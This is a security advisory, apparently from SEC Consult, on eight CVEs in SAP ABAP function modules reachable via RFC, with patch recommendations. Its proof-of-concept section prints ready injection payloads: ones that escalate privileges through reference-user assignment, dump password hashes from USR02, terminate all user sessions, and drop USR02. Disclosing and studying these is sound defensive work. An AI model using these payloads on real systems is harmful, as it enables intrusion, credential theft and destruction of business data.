Vendor description:
"SAP is a market share leader in enterprise resource planning (ERP), analytics, supply chain management, human capital management, master data management, data integration as well as in experience management" [1]. Customers comprise 92% of the Forbes Global 2000 companies and 98% of the 100 most valued brands. 77% of the world’s transaction revenue touches an SAP system [1, 2].
"SAP NetWeaver Application Server for ABAP (AS ABAP) is a platform on which important business processes run. It provides a complete development and runtime environment for ABAP-based applications. The purpose of AS ABAP is to provide programmers with an efficient means of expressing business logic and relieve them from the necessity of platform-related and purely technical coding. AS ABAP is therefore a basis for all ABAP systems" [3].
"The [successor] ABAP platform provides a reliable and scalable server and programming environment for modern ABAP development [...]. The ABAP platform offers support for SAP HANA and SAP Fiori and allows developers to efficiently build enterprise software that meets the requirements of their business scenarios – on-premise as well as in the cloud" [4].
[1] https://www.sap.com/about/company.html
[2] https://www.sap.com/documents/2017/04/4666ecdd-b67c-0010-82c7-eda71af511fa.html
[4] https://developers.sap.com/topics/abap-platform.html
Business recommendation
By exploiting the vulnerabilities documented in this advisory, privileged attackers can take complete control of affected application servers. Thus, successful exploitation can enable fraud, sabotage or data theft while affecting confidentiality, integrity, and availability of business data.
SEC Consult recommends to implement security notes 2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657 where the documented issues are fixed according to the vendor. We advise installing the corrections as a matter of priority to keep business-critical data secured.
Vulnerability overview/description
Advanced Business Application Programming (ABAP)® is a proprietary programming language by SAP SE. In common with every other programming language, ABAP can be susceptible to software vulnerabilities ranging from missing or improper authorization checks to inadequate input validation and output sanitization. Of particular concern are injection vulnerabilities, which can jeopardize the overall system security.
Remote Function Call (RFC) is a proprietary network protocol by SAP SE. Comparable to application programming interfaces (APIs), SAP systems come with thousands of built-in function modules implemented in ABAP. RFC allows remote-enabled functions to be accessed via the network. This makes it possible to decentralize business applications even across system boundaries. External programs and external clients can make use of RFC connections to interact with an SAP system via libraries (e.g. NW RFC SDK) provisioned by SAP SE.
This advisory covers multiple critical vulnerabilities discovered in the ABAP® coding of standard function modules. These are part of different software components that build upon the bedrock products SAP® Application Server ABAP and ABAP® Platform.
1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform
Function modules RSDU_LIST_DB_TABLE_SYB and RSDU_LIST_DB_TABLE_DB4of function groups RSDU_UTIL_SYB and RSDU_CORE_UTIL_DB4 are vulnerable to ABAP code injection bugs allowing to execute arbitrary ABAP code. Successful exploitation leads to full system compromise.
2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS)
Function module CNV_MBT_SEL_STRING_RETURN of function group CNV_MBT_SEL is vulnerable to an ABAP code injection bug allowing to embed arbitrary code into the ABAP Repository. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise.
3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation)
Function module CNV_GET_USERS_FOR_APP_SERVER of function group CNV_00001_HELP does not perform any programmatically implemented authorization check. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows to retrieve internal information and to make a targeted SAP system completely unavailable to its intended users. The latter is to be considered as a Denial of Service (DoS) attack.
4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface)
Function module RSDL_DB_GET_DATA_BWS of function group RSDL does not perform any programmatically implemented authorization check. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows to read out the entire database including cross-client data access.
5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface)
Function module RSDL_DB_GET_DATA_BWS of function group RSDL is vulnerable to a native SQL injection (ADBC) bug allowing to execute arbitrary SQL commands at database level. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise.
6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA
Function module RSDRI_DF_TEXT_READ of function group RSDRI_DF_FACADE is vulnerable to an ABAP code injection bug allowing to embed arbitrary code into the ABAP Repository. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise.
7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP and ABAP Platform
Function module SRM_RFC_SUBMIT_REPORT of function group SRM_REP does not enforce proper authorization checks for critical use of a dynamic program call. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows an attacker to execute existing ABAP reports without holding sufficient authorizations.
8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework)
Function module CONVERT_FROM_CHAR_SORT_RFW of function group FG_RFW contains a code injection vulnerability with a limited exploitation primitive. An attacker can abuse this bug to delete critical system tables (e.g. USR02), making the targeted SAP system completely unavailable to its intended users.
Proof of concept
1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform
The vulnerable functions make use of the GENERATE SUBROUTINE POOL instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. This code gets executed on the fly by the application server in the course of execution of the functions.
The following payload exploits the bug to escalate privileges via reference user assignment:
Import Parameter: I_TABLNM
Value: USR02
Import Table: I_T_SELECT_FIELDS
╒═══════════════════════════════════════════════════════════════╕
│ RSD_FIELDNM │
╞═══════════════════════════════════════════════════════════════╡
│ BNAME │
╘═══════════════════════════════════════════════════════════════╛
Import Table: I_T_WHERE_COND
╒═══════════╤══════╤════════════════════════════════════════════╕
│ FIELDNM │ OP │ LOW │
╞═══════════╪══════╪════════════════════════════════════════════╡
│ BNAME │ EQ │ S'ENDEXEC. EXEC SQL.UPDATE USREFUS SET │
│ │ │ REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER │
╘═══════════╧══════╧════════════════════════════════════════════╛
2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS)
The vulnerable function makes use of the INSERT REPORT instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. Inserted code may be executed by chaining this bug with CVE-2021-21473.
The following payload exploits the bug to escalate privileges via reference user assignment:
Import Parameter: TABNAME
Value: USR02
Import Table: IMT_SELSTRING
╒══════════════════════════════════════════════════════════════╕
│ LINE │
╞══════════════════════════════════════════════════════════════╡
│ BNAME = 'TEST'. ENDSELECT. │
├──────────────────────────────────────────────────────────────┤
│ UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER' │
├──────────────────────────────────────────────────────────────┤
│ SELECT * FROM USR02 │
╘══════════════════════════════════════════════════════════════╛3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation)
The vulnerable function does not perform any explicit authorization check. Depending on a specific import parameter, the function leaks active logon sessions (opcode 02) or terminates all active logon sessions (opcode 25) by kernel call 'ThUsrInfo'. Invoking the function periodically prevents users from logging into the application server.
The following payload exploits the bug to trigger the information disclosure and enumerate active user sessions:
Import Parameter: MODE
Value: 1 The following payload exploits the bug to terminate all active user sessions:
Import Parameter: MODE
Value: 2 4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface)
The vulnerable function does not perform any explicit authorization check. It uses predefined classes and methods from the ABAP Database Connectivity (ADBC) framework to execute native SQL queries at database level. Depending on specific import parameters, this allows to read out arbitrary table data including user master records or secure storages (e.g. RSECTAB).
The following payload exploits the bug to exfiltrate user password hashes:
Import Table: I_S_TABSEL
╒══════════════════════════════════════════════════════════════╕
│ NAME │
╞══════════════════════════════════════════════════════════════╡
│ USR02 │
╘══════════════════════════════════════════════════════════════╛
Import Table: I_S_DBCON
╒══════════════════════════════════════════════════════════════╕
│ CON_NAME │
╞══════════════════════════════════════════════════════════════╡
│ <Database Connection String> (e.g. DEFAULT) │
╘══════════════════════════════════════════════════════════════╛
Import Table: I_T_DBFIELDS
╒═══════════════╤═════════╤════════════════════════════════════╕
│ NAME │ TYPE │ LENGTH │
╞═══════════════╪═════════╪════════════════════════════════════╡
│ BNAME │ CHAR255 │ 000255 │
├───────────────┼─────────┼────────────────────────────────────┤
│ PWDSALTEDHASH │ CHAR255 │ 000255 │
╘══════════════════════════════════════════════════════════════╛5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface)
The vulnerable function does not perform any input validation or output sanitization on import parameters that can be used to define conditional SQL statements. This allows to inject arbitrary SQL commands that get executed natively at database level in the course of execution of the function.
The following payload exploits the bug to escalate privileges via reference user assignment:
Import Table: I_S_TABSEL
╒══════════════════════════════════════════════════════════════╕
│ NAME │
╞══════════════════════════════════════════════════════════════╡
│ USR02 │
╘══════════════════════════════════════════════════════════════╛
Import Table: I_S_DBCON
╒══════════════════════════════════════════════════════════════╕
│ CON_NAME │
╞══════════════════════════════════════════════════════════════╡
│ <Database Connection String> (e.g. DEFAULT) │
╘══════════════════════════════════════════════════════════════╛
Import Table: I_T_DBFIELDS
╒═══════════════╤═════════╤════════════════════════════════════╕
│ NAME │ TYPE │ LENGTH │
╞═══════════════╪═════════╪════════════════════════════════════╡
│ BNAME │ CHAR255 │ 000255 │
╘══════════════════════════════════════════════════════════════╛
Import Table: I_T_SELECT
╒══════════════════════╤════════╤══════════════════════════════╕
│ FIELDNM │ OPTION │LOW │
╞══════════════════════╪════════╪══════════════════════════════╡
│ BNAME │ EQ │'';UPDATE USREFUS SET REFUSER │
│ │ │='DDIC' WHERE '1 │
├──────────────────────┼────────┼──────────────────────────────┤
│ ' = '1 AND' AND BNAME│ EQ │'ATTACKER'; │
╘══════════════════════════════════════════════════════════════╛6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA
The vulnerable function makes use of the INSERT REPORT instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. Inserted code may be executed by chaining this bug with CVE-2021-21473.
The following payload exploits the bug to escalate privileges via reference user assignment:
Import Parameter: I_TABLE_NAME
Value: INJECTION
Import Parameter: I_DEBUG_SUFFIX
Value: SAP
Import Table: I_T_RANGE_STRING
╒═══════════╤═════════════════════════════════════╤════════════╕
│ CHANM │ LOW │ HIGH │
╞═══════════╪═════════════════════════════════════╪════════════╡
│ BNAME │ '. UPDATE USREFUS SET REFUSER │ '. EXIT. " │
│ │ = 'DDIC' WHERE BNAME = 'ATTACKER │ │
╘═══════════╧═════════════════════════════════════╧════════════╛
7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP and ABAP Platform
The vulnerable function uses a dynamically generated program name (based on data from untrusted sources) in a SUBMIT call. No authorization checks are programmatically enforced. Thus, a remote, unauthorized attacker can leverage this function to start any existing ABAP report by providing the respective report name in the import parameter REPORTNAME.
8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework)
The vulnerable function makes use of the GENERATE SUBROUTINE POOL instruction in form 'get_dynamic_fields' by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. These parameters are limited in size due to their variable type. This restricts an attacker in exploitation scenarios. However, it is still possible, for example, to delete critical system tables by exploiting this bug.
The following payload exploits the bug to drop table USR02, leading to a complete loss of availability of the target system:
Import Parameter: RTABNAME
Value: X. EXEC SQL. DROP TABLE USR02-
Import Parameter: RFIELDNAME
Value: ENDEXEC